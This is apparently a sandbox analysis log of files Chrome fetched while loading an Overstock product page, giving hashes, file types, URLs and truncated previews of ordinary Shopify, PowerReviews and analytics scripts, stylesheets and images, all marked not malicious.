                                                                                                                                                          Preview:const __vite__mapDeps=(i,m=__vite__mapDeps,d=(m.f||(m.f=["component-ShopPayVerificationSwitch.DfLc0zrq.js","app.CRtF78CU.js","assets/app.BK5OxPpc.css","publishMessage.Zuhtx4a1.js","useUnauthenticatedErrorModal.gdEu53Hp.js","index.C7lQ-Nke.js","LegacyVaultedShippingMethods.8dZ3Q6PP.js","Rollup.B3ludNL-.js","assets/Rollup.o9Mx-fKL.css","SubscriptionPriceBreakdown.CcRBYBQn.js","assets/SubscriptionPriceBreakdown.Bqs0s4oM.css","MarketsProDisclaimer.BZXsgf5w.js","ShopPayLogo.D_tvM4Kt.js","assets/ShopPayLogo.D_HPU8Dh.css","index.Da9Wf6zy.js","PickupPointCarrierLogo.C-y5TkoQ.js","assets/PickupPointCarrierLogo.C0wRU6wV.css","hooks.CY4n-DVx.js","assets/ShopPayVerificationSwitch.DVQdwG9J.css","component-GooglePayButton.CbF1kUjk.js","useGooglePaySdk.DGK5p3VT.js","assets/GooglePayButton.C9QQ9NQG.css","component-FacebookPayButton.C3-2n8O9.js","assets/FacebookPayButton.CTYBjZ8U.css"])))=>i.map(i=>d[i]);.import{r as ee,as as U,c1 as ce,e as L,Y as Ve,cy as Be,cC as tn,T as W,c as ue,aN as Z,jm as Xe,k
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:JSON data
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):79
                                                                                                                                                          Entropy (8bit):2.716326985350135
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:8E3DB10AF5A3E1CABE7AA67674E21188
                                                                                                                                                          SHA1:E2314B0038DF2D49DDBE461F33A6797D4586CDE0
                                                                                                                                                          SHA-256:87ECD5BABD6FD9F4F6F796D745AA38751FAF3985E3B55F87A2F53E506FE07362
                                                                                                                                                          SHA-512:A4F136016F4591E021D54F06141896581371828BF02F662A050B2A36567DFEC6068A4C758815D481E01BD7D68692329B5EE228C854AB2D85246D05B56692FB09
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          Preview:[71, 73, 70, 56, 57, 97, 1, 0, 1, 0, 0, 0, 0, 44, 0, 0, 0, 0, 1, 0, 1, 0, 0, 2]
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:HTML document, Unicode text, UTF-8 text, with very long lines (2070)
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):210306
                                                                                                                                                          Entropy (8bit):5.097440907583452
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:AC41345538A63E633F6E68DB28C1073E
                                                                                                                                                          SHA1:D3E4CAE362D7589451961042DA73A297B5643031
                                                                                                                                                          SHA-256:7BF27D6722F4DDB23E0916808AC9617A20CF4B28677BD184D81C84B01AC29DF7
                                                                                                                                                          SHA-512:11969B52D337C25B3007B09A66091129459DCAF2FC924F558E680795F5ABB027F741CB81A4B6AA18478B63DC1B07E76B6F103ECE11CBC585C36C275763AB98B6
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          URL:https://www.overstock.com/search?section_id=template--16924570026143__featured_collection_k3HKtr&limit=24&q=id:9284336943263+OR+id:9284319183007+OR+id:9258194436255+OR+id:9284243751071+OR+id:9285483266207+OR+id:9283983573151+OR+id:9288144781471+OR+id:9256434172063+OR+id:9287203881119+OR+id:9256230224031+OR+id:9273127239839+OR+id:9256542208159+OR+id:9286833111199+OR+id:9284157210783+OR+id:9256605483167+OR+id:9287194050719+OR+id:9256201846943+OR+id:9221410422943+OR+id:9273144606879+OR+id:9256762081439+OR+id:9283790962847+OR+id:9379751231647+OR+id:9265247682719+OR+id:9256212856991&resource_type=product
                                                                                                                                                          Preview:<section id="shopify-section-template--16924570026143__featured_collection_k3HKtr" class="shopify-section cc-featured-collection">. <link href="//www.overstock.com/cdn/shop/t/211/assets/component-reference-pricing.css?v=160032368790096176431729142870" rel="stylesheet" type="text/css" media="all" />..<link href="//www.overstock.com/cdn/shop/t/211/assets/featured-collection.css?v=64892234005846914921729142870" rel="stylesheet" type="text/css" media="all" />. <link href="//www.overstock.com/cdn/shop/t/211/assets/product.css?v=81253555964418955201729142870" rel="stylesheet" type="text/css" media="all" />.<div class="section"><div class="container">. <div class="section__header items-center flex flex-row flex-wrap gap-x-theme" data-cc-animate><h2 class="h4 mb-0 flex-auto section__heading text-start">Featured <strong>Deals</strong></h2>. . <a href="/collections/all-categories?2219056=[&quot;2232847&quot;]" class="link">View all</a></div>. </div><carousel-slider cl
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:Java source, Unicode text, UTF-8 text, with very long lines (6761)
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):7168
                                                                                                                                                          Entropy (8bit):5.420495299395382
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:876EDE92F908E33D47B8C65528671221
                                                                                                                                                          SHA1:B1F6E35FB58F9589B3114D562DA6C7B3EE643152
                                                                                                                                                          SHA-256:4716CFEE5F2DB5AEF0A5F88F81EB86A1CF97ADB107DF8D8F02C8967503752C0C
                                                                                                                                                          SHA-512:92C95D7DDC4B72C5A198CA2264FDD716AE2E3FAE856462D0923D749835356460A0E89B2B947F7A99D994DA0B9DD9D09CC7EDA4DE8C887A468E03555D0A7C8472
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          URL:https://cdn.shopify.com/shopifycloud/checkout-web/assets/c1.en/useAmazonContact.WvHD3hTp.js
                                                                                                                                                          Preview:const __vite__mapDeps=(i,m=__vite__mapDeps,d=(m.f||(m.f=["component-DeliveryMacros.D4mQrCGq.js","app.CRtF78CU.js","assets/app.BK5OxPpc.css","DeliveryMacro.vWtSFNDq.js","SubscriptionGroupLine.CbIhyb-3.js","SubscriptionPriceBreakdown.CcRBYBQn.js","assets/SubscriptionPriceBreakdown.Bqs0s4oM.css","StackedMerchandisePreview.B7T1npCx.js","assets/StackedMerchandisePreview._xnAOXmq.css"])))=>i.map(i=>d[i]);.import{bJ as Me,bK as be,_ as Re,ai as b,e as f,a as e,a6 as ee,a7 as h,aa as R,aA as xe,aN as x,aq as ne,mM as Ae,am as ie,q as _,at as ke,au as Fe,cQ as He,cS as te,qS as Ve,r as Be,H as we,dT as Ue,h as K,as as se,dj as qe,aV as Ge,cd as Q,lG as $e,c_ as ze,kW as We,y as X,T as Ye,j as je,p as Je,dq as Ke,f1 as Qe,qT as Xe,aZ as Ze,dp as en,a$ as nn,qU as tn,a_ as sn,ay as oe,cf as N,aY as on,ad as rn,hi as an,aW as ln,V as C,aj as dn,jn as cn,d$ as pn,fO as un,jv as hn,cT as yn,c1 as vn}from"./app.CRtF78CU.js";const Cn=Me({displayName:"DeliveryMacros",load:()=>be(()=>Re(()=>import("./co
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text, with very long lines (62605)
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):62653
                                                                                                                                                          Entropy (8bit):5.343169197914495
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:D6EF635E56E3AB574C7F10E9A5AB49EC
                                                                                                                                                          SHA1:3C384372E7E2D221150A14D60776D7C7FEB8ADE6
                                                                                                                                                          SHA-256:468E777478117BE830B202B97CDF0304BEE6F3D9FD4CB1CE70650ED93B7FA4A1
                                                                                                                                                          SHA-512:CEFE7B68B1C25D8192F3D3BBC734D89894E23AB0B6BDBE35878255A574C53FFA1DE27002B5098ABB2DEFB5D3427B309B0F070E010967CE5CFFB1669745A95A5D
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          URL:https://www.overstock.com/cdn/shopifycloud/boomerang/shopify-boomerang-1.0.0.min.js
                                                                                                                                                          Preview:(()=>{var e={875:(e,t)=>{function n(e,t,n){t.open("POST",e),t.setRequestHeader("Content-type","text/plain"),t.send(JSON.stringify(n))}t.monorailSend=function(e,t,r){if(window&&window.navigator&&"function"==typeof window.navigator.sendBeacon&&t.utils.isNative(window.navigator.sendBeacon)&&"function"==typeof window.Blob&&(!(o=window.navigator.userAgent)||-1===o.lastIndexOf("iPhone; CPU iPhone OS 12_")&&-1===o.lastIndexOf("iPad; CPU OS 12_"))){var i=new window.Blob([JSON.stringify(r)],{type:"text/plain"});try{if(window.navigator.sendBeacon(e,i))return!0}catch(e){}}var o,a=new XMLHttpRequest;try{n(e,a,r)}catch(i){n(e,a=new t.boomerang_frame.XMLHttpRequest,r)}};const r="xxxx-4xxx-xxxx-xxxxxxxxxxxx";t.buildUUID=function(){let e="";try{const t=window.crypto,n=new Uint16Array(31);t.getRandomValues(n);let i=0;e=r.replace(/[x]/g,(e=>{const t=n[i]%16;return i++,("x"===e?t:3&t|8).toString(16)})).toUpperCase()}catch(t){e=r.replace(/[x]/g,(e=>{const t=16*Math.random()|0;return("x"===e?t:3&t|8).toStr
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:Unicode text, UTF-8 text, with very long lines (65441), with CRLF line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):65873
                                                                                                                                                          Entropy (8bit):5.353463187318388
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:EAC3A1187696C86284089D8FDB7AEE42
                                                                                                                                                          SHA1:ECEC68A507611BCE20829072C5E15A019D767F57
                                                                                                                                                          SHA-256:36B4B4C6757A5D380D22A491759F8A72F54B16791387C3826E69D2546208D4F4
                                                                                                                                                          SHA-512:36D2AB3D1861ED0E8897BE738C61BEAFC35D7BB9D5506B7DEED217AEEC40942E1771DFA9AFFE8EC06971283FE4EBFEE85AB1EB0BDC67967EA520C95B16AEA20A
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          Preview:/* clarity-js v0.7.48: https://github.com/microsoft/clarity (License: MIT) */..!function(){"use strict";var t=Object.freeze({__proto__:null,get queue(){return sr},get start(){return cr},get stop(){return lr},get track(){return ar}}),e=Object.freeze({__proto__:null,get clone(){return Cr},get compute(){return Dr},get data(){return Er},get keys(){return Or},get reset(){return Ar},get start(){return _r},get stop(){return Rr},get trigger(){return Ir},get update(){return jr}}),n=Object.freeze({__proto__:null,get check(){return Xr},get compute(){return qr},get data(){return Sr},get start(){return Wr},get stop(){return Ur},get trigger(){return Yr}}),a=Object.freeze({__proto__:null,get compute(){return Kr},get data(){return Fr},get log(){return Gr},get reset(){return Zr},get start(){return Br},get stop(){return Jr},get updates(){return Vr}}),r=Object.freeze({__proto__:null,get callbacks(){return $r},get clear(){return ui},get consent(){return oi},get data(){return Qr},get electron(){return ti},
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=6, orientation=upper-left, xresolution=86, yresolution=94, resolutionunit=2], progressive, precision 8, 320x320, components 3
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):31265
                                                                                                                                                          Entropy (8bit):7.957143230509137
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:036F9F6E9685C2EF83F306346CC84662
                                                                                                                                                          SHA1:DED5C867E5F876F38D7796C6D1F4662F1EE32776
                                                                                                                                                          SHA-256:CAFB615C5CA68539C29B1263C1C17EEA0983DF69C7D266205A9ACE82FAD83B32
                                                                                                                                                          SHA-512:AD7CDB4011DB89B97DCC797D127E1D704B03339E4C407EEB6D5B003E25C5AA1A4995E55587B02BCCC4E9C9739AA87EB38611012166D211223B0C35DB7B388C15
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          Preview:......Exif..II*...........................V...........^...(.......................i.......f.......H.......H.................0210....................0100....................@...........@...........ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$............C............................................) .. )/'%'/9339GDG]]}...C............................................) .. )/'%'/9339GDG]]}......@.@..........................................................................................B..S......g.KR.e7......Gj...:........gJ...g..)H.7\...z....G.....+eTD.N2).-,..sJ.1.SZI."3CH.f..Y.?Mq;BvvM. W.R..e.u&.1.9J.U
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):29182
                                                                                                                                                          Entropy (8bit):7.979279601086008
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:B924B15582BE697C9C3BC7579A15DCEA
                                                                                                                                                          SHA1:35E0F40908C045F1D29F0F975A80C5FFC2A6AF3C
                                                                                                                                                          SHA-256:2567E2D5582E68BFDF04CAB97B7A8004FA13D3002EBE0EC3050CE5DE534ECAAB
                                                                                                                                                          SHA-512:F55FE888F01FD96F85D3EF28CE175E00B4B149A41AFBE434D82C8AD95265A8146DD89683531B483FF6200CCBC4EF4E72E0543EE4D347B0B3DDDA3360BDC75130
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          URL:https://www.overstock.com/cdn/shop/files/SAFAVIEH-Handmade-Novelty-Sheyla-Ornate-Flower-Wool-Rug_f7af6155-e87f-4ba4-be2d-a950cbaf5013.jpg?v=1715132695&width=320
                                                                                                                                                          Preview:RIFF.q..WEBPVP8X....(...?..?..ICCP........lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$.........VP8 fo...)...*@.@.>5..B.!!.Jm. .D..p.H`oN.Y....?.q..o..........}V.e.......[...../...t..?...............^ob.......t=c..~....D..._.o.G.../...=.?.{Z..............?.?...._.'.....0G._....S.....?....g....!.p.W...W./.......M.....w./..{.....[.|..M...+....]?..........WO.?q..~....+.K......o..H..i....UD.8..=A....B..P.S.;.V...&};0.w.Y...3."....Z....%.W..t2._|a.#...m&4|.!:...;.M.&..F;.k.l....jO.e.d.N.-.Q..Ep.b...-..RMQF..2[.^.e..az.y.1.........9.K..>PG..$....E`....c.~.....CQ.....%..)..9sz.&..?..M=.G..MY...,.....tR.mk.i:^...*.
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:Java source, ASCII text, with very long lines (3395)
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):3396
                                                                                                                                                          Entropy (8bit):5.071966145411214
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:F5E706A1C0D2B77CA1ECE79ECFB58DA8
                                                                                                                                                          SHA1:04A59B25819DA36DABFB84F53D1C05D72B725B12
                                                                                                                                                          SHA-256:8B4267CA885FDAB8E21A174E0C8D49BE0D694ECFB154481950688B853B3680E6
                                                                                                                                                          SHA-512:27159811697AD9E8894C0AE1F283ABD8AB8ED6C1BF2DBF331904D6AFA789465014EA26BEFCAA4CE1F85616634948D33BA76113596DFAB8A6969D66CD1F05511E
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          URL:https://cdn.shopify.com/shopifycloud/checkout-web/assets/c1.en/StockProblemsLineItemList.DC3doC-_.js
                                                                                                                                                          Preview:import{e as u,j as m,a as e,a9 as o,ay as b,a8 as g,aW as f,b6 as l,b7 as k,b8 as s,l as S,k as _,b9 as P,ba as h,bb as L,S as d,bc as I,bd as c,be as C,bf as T}from"./app.CRtF78CU.js";function z({quantity:n,previousQuantity:t}){const a=u(),{lineItems:{titleTypographyStyle:i,optionsTypographyStyle:r,optionsAppearance:p="subdued",optionsEmphasis:y}}=m();return e(b,{spacing:"none",inlineAlignment:"end",children:[e(o,{...{size:"small",appearance:p,emphasis:y,style:r},appearance:"subdued",accessibilityRole:"deletion",children:a("stock.item_label",{count:t},{one:"{{count}} item",other:"{{count}} items"})}),e(o,{style:i,children:a("stock.item_label",{count:n},{one:"{{count}} item",other:"{{count}} items"})})]})}const O="IDG1X",R={OutOfStockLabel:O};function v({merchandiseIssueType:n}){const t=u(),a=()=>{switch(n){case l.Unfulfillable:case l.Unavailable:return t("contextual_availability.unavailable_label","Unavailable");case l.Unpurchasable:case l.UnpurchasableB2B:return t("stock.unpurchasabl
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text, with very long lines (9525)
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):9621
                                                                                                                                                          Entropy (8bit):5.082618664505842
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:1ACBA347CFE61ECB1333938C2CFCA0C8
                                                                                                                                                          SHA1:69CD6869CDDDD1367E4647304A50EDC7423B3B15
                                                                                                                                                          SHA-256:1B9331EA0829FDDE892780E2C7A8E5DFAE60DE6D213CEBD3490F6FDD054ED12D
                                                                                                                                                          SHA-512:0999AE1EB20945433B6C97483AAFEAF0EA095B61AFEC8AEFA8A736DEB91C4C3BC5981C9582F1A51311FD1162161C6E30FCC1358A2C42DA72EE0AAD5D44B50D06
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          URL:https://www.overstock.com/cdn/shop/t/211/assets/product.css?v=81253555964418955201729142870
                                                                                                                                                          Preview:.option-selector{padding:0;border:0}.option-selector:not(:last-child){margin-bottom:2rem}.option-selector .label{margin-bottom:.5em}.option-selector__label-value{font-weight:400}.option-selector__btns{margin-top:-12px}.opt-label{margin-top:12px;margin-inline-end:12px;border:var(--btn-border-width) solid rgba(var(--text-color)/.2);border-radius:var(--btn-border-radius, 0);cursor:pointer}.opt-label--btn{min-width:50px;padding:var(--btn-padding-y, 12px) 16px;background-color:rgba(var(--bg-color));color:rgb(var(--text-color))}.opt-label--btn:hover{background-color:rgba(var(--text-color)/.05)}.opt-btn:focus-visible+.opt-label{outline-offset:3px}.opt-btn:checked+.opt-label--btn{background-color:rgba(var(--bg-color));color:rgb(var(--text-color))}.opt-btn:checked+.opt-label:not(.opt-label--swatch):after,.is-unavailable+.opt-label .opt-label__media:after{content:"";display:block;position:absolute;top:0;left:0;width:100%;height:100%}.opt-btn:checked+.opt-label:not(.opt-label--swatch):after{borde
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:JSON data
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):147
                                                                                                                                                          Entropy (8bit):4.715525831374741
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:BBB01CD62115A2520CA04C270AB3EC28
                                                                                                                                                          SHA1:03D2F26A333F641D8C694289C149371BCE33B57B
                                                                                                                                                          SHA-256:32A4C8CAB83D26561E52337E423165BF39F936DC5C982E2220B032DA66B55992
                                                                                                                                                          SHA-512:F3508B6343442008A511D51F6EEA08DC1FB89B207F92700D0B488AE27FC999686E3584FCED75DEBCD53DBC68EEC35529974B90910CE99D44C5F26E1AD797C79B
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          URL:https://display.powerreviews.com/m/1280018588/l/en_US/product/40448659/snippet?apikey=0ce15d13-67ca-47dd-8c72-1d5e4694ada3&_noconfig=true
                                                                                                                                                          Preview:{"name":"snippet","results":[{"page_id":"40448659","rollup":{"average_rating":4.64,"rating_count":321,"review_count":321,"answered_questions":0}}]}
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text, with very long lines (21856)
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):52387
                                                                                                                                                          Entropy (8bit):5.397303672227873
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:7EE104753099F9F00003724EB0A4C433
                                                                                                                                                          SHA1:1D755195CA80161CA0D9694E4A1A18B42720A0AC
                                                                                                                                                          SHA-256:0BA6B163F965F258C24888CF11C6DFE0D044DE0800284DA2E78A3FAF7BD12925
                                                                                                                                                          SHA-512:CB0916F1D31C1D73DAC81D742B38F239B5B07A9C84560EA318E6D05BCE16721433B722035143E0F642B1EB136577BD2416719B4BEBED37AEB048700C4EC8FE1F
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          Preview:.!function(e){var n={};function __webpack_require__(t){if(n[t])return n[t].exports;var r=n[t]={i:t,l:!1,exports:{}};return e[t].call(r.exports,r,r.exports,__webpack_require__),r.l=!0,r.exports}__webpack_require__.m=e,__webpack_require__.c=n,__webpack_require__.d=function(e,n,t){__webpack_require__.o(e,n)||Object.defineProperty(e,n,{enumerable:!0,get:t})},__webpack_require__.r=function(e){"undefined"!=typeof Symbol&&Symbol.toStringTag&&Object.defineProperty(e,Symbol.toStringTag,{value:"Module"}),Object.defineProperty(e,"__esModule",{value:!0})},__webpack_require__.t=function(e,n){if(1&n&&(e=__webpack_require__(e)),8&n)return e;if(4&n&&"object"==typeof e&&e&&e.__esModule)return e;var t=Object.create(null);if(__webpack_require__.r(t),Object.defineProperty(t,"default",{enumerable:!0,value:e}),2&n&&"string"!=typeof e)for(var r in e)__webpack_require__.d(t,r,function(n){return e[n]}.bind(null,r));return t},__webpack_require__.n=function(e){var n=e&&e.__esModule?function getDefault(){return e
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=6, orientation=upper-left, xresolution=86, yresolution=94, resolutionunit=2], progressive, precision 8, 320x320, components 3
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):9598
                                                                                                                                                          Entropy (8bit):7.713305889695654
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:6F0478B5E267F398252AD0DBE00D2718
                                                                                                                                                          SHA1:283A3DAA64105FB45A5E9F3F5AEF13615BDF1C63
                                                                                                                                                          SHA-256:BEC5F00E509D50C776BEC3149EF0C3784BACEFD48440FCE1E7E7A45C154D62AA
                                                                                                                                                          SHA-512:297061EF2464F8DBADB4B0CB1AE17047C7025F14761471C5505D705580B504B547195AA5680CC5F1D998C91B46C56A2BAE945A84538D7E427A4AFF274D2AD55B
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          Preview:......Exif..II*...........................V...........^...(.......................i.......f.......H.......H.................0210....................0100....................@...........@...........ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$............C............................................) .. )/'%'/9339GDG]]}...C............................................) .. )/'%'/9339GDG]]}......@.@...........................................................................................................................................................................................`..e..=.....9.LlM.............
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):27464
                                                                                                                                                          Entropy (8bit):7.9768533573241225
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:D5D9A32AC153980BEC47387D04BA5EF5
                                                                                                                                                          SHA1:2FF868B5B4E7107626B720F7F9F0B9A491C122C4
                                                                                                                                                          SHA-256:970D6C0D6AECE820C40769CB0F8EB4EA5DDA68C8BE3562186A3EC8AAECD0A74B
                                                                                                                                                          SHA-512:F97FD031952E2BE45A4C592D7095302772702F6441EAC37E3ECE82EC85279093FEE9FD94CDD30EE9B33FF1D524F2B82C15650C55615D848E807F991F925C5222
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          URL:https://www.overstock.com/cdn/shop/files/SAFAVIEH-Amelia-Agda-Abstract-Rug_fbbcec80-8560-4243-b4f3-0a443c195525.jpg?v=1728147936&width=320
                                                                                                                                                          Preview:RIFF@k..WEBPVP8X....(...?..?..ICCP........lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$.........VP8 .h..P....*@.@.>9..C"!!.I~. .......#...\...f...x...a.....}.?....)......._S...........Y..}.....a.._Z.........~.v.........Y.._..G._..K...{.{.}....'.?...+........3.i..........>.S.....?...w............................O.~._......g..........?+.........7........@...o..g..x.....?r.........KU....r.n.E.p_..u...!.cD)s...e.....c....i'.*.y..*......<Z.Y.t.Y.-.{.W.~........7~..L...aB...p.......w6.....H;..^.D...Qu.....>...a........L.#+....J%p...n...s.b......$.....U..L..z$SN.:.N.f.U.X..b.!..*..Hq`a..WvdC%.xl.....r.B=...$.
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text, with very long lines (39697)
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):136265
                                                                                                                                                          Entropy (8bit):5.4579040090972
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:F9A7ED66DD7A1D0D455909151E237716
                                                                                                                                                          SHA1:E416BFBC43087EC32183621A3DFD080C14D2155D
                                                                                                                                                          SHA-256:712F2DF6C9B6EBCB88B1C6173328752C352C2EC22E3C50CB5AFC934DD056F684
                                                                                                                                                          SHA-512:92A427AF8B0945D0CE385573603597E118D373AE163B282D66530600F88B01673CD243930C6BCF2F8367A05DAC4647FEE346681BB481BAC2E3681BDD46470710
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          URL:https://ui.powerreviews.com/tag-builds/10461/4.1/js/chunks/engine.js
                                                                                                                                                          Preview:/*!. * PowerReviews, Copyright 2024. * Build: 10461 | a4644180a | 10/3/2024. */.(self.pwrClg=self.pwrClg||[]).push([[976],{71387:e=>{e.exports={cloudinaryUploadBase:"https://api.cloudinary.com/v1_1/powerreviews/auto/upload",cloudinaryDownloadBase:"https://media.powerreviews.com",local:{name:"local",entryPath:"https://localhost:3001/",assetPath:function(){return"https://localhost:3001/"},akamaiUIBase:"https://localhost:3001",awsUIBase:"https://localhost:3001",writeBase:"https://devwriteservices.powerreviews.com",b2cReadBase:"https://dev-origin-readservices-b2c-api.powerreviews.com",b2cReadOrigin:"https://dev-origin-readservices-b2c-api.powerreviews.com",b2cReadOS:"https://dev-display-api.powerreviews.io",b2cReadProxy:"https://devui.powerreviews.com/api/",cloudinaryImagePreset:"dev_preset",cloudinaryVideoPreset:"dev_video_preset",trackingBase:"https://t-dev.powerreviews.com",servicesBase:"https://qaservices.powerreviews.com/JSController.do",uiPRBase:"https://localhost:3001",versionFullJS
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 112 x 112, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):423
                                                                                                                                                          Entropy (8bit):5.389516388428603
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:31E34FEC40A4DAB3EF2954E78DB41CED
                                                                                                                                                          SHA1:AFFCEFBD807EBF2A46E1E0BA19D4F9940A5226D7
                                                                                                                                                          SHA-256:A483A67511346B69EE0EA6AEFF847C0A8543938467E9F800AF14667F687ED86F
                                                                                                                                                          SHA-512:69C3CBEF160974B245ADD28B9CCBCB7BE238220494ED3CC6C51BF15AE112A6959B5550DE80C537E4779C225FC679D20692BBF9BF72FC466852A25139235C70D7
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          URL:https://cdn.shopify.com/s/files/1/0633/7105/1167/files/checkout-background-color_2000x.png?v=1711575937
                                                                                                                                                          Preview:.PNG........IHDR...p...p........K...$eXIfII*.......<...............imagery4..'=......pHYs.................sRGB.........gAMA......a.....IDATx...... ....*..d..q.T`.9o..C..8.q........'0N`..8.q........'0N`..8.q........'0N`..8.q........'0N`..8.q........'0N`..8.q........'0N`..8.q........'0N`..8.q........'0N`..8.q........'0N`..8.q........'0N`..8.q........'0N`..8.q........'0N`..8.q........'0N`..8.q..............G.......IEND.B`.
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):4898
                                                                                                                                                          Entropy (8bit):7.731656777205108
                                                                                                                                                          Encrypted:false
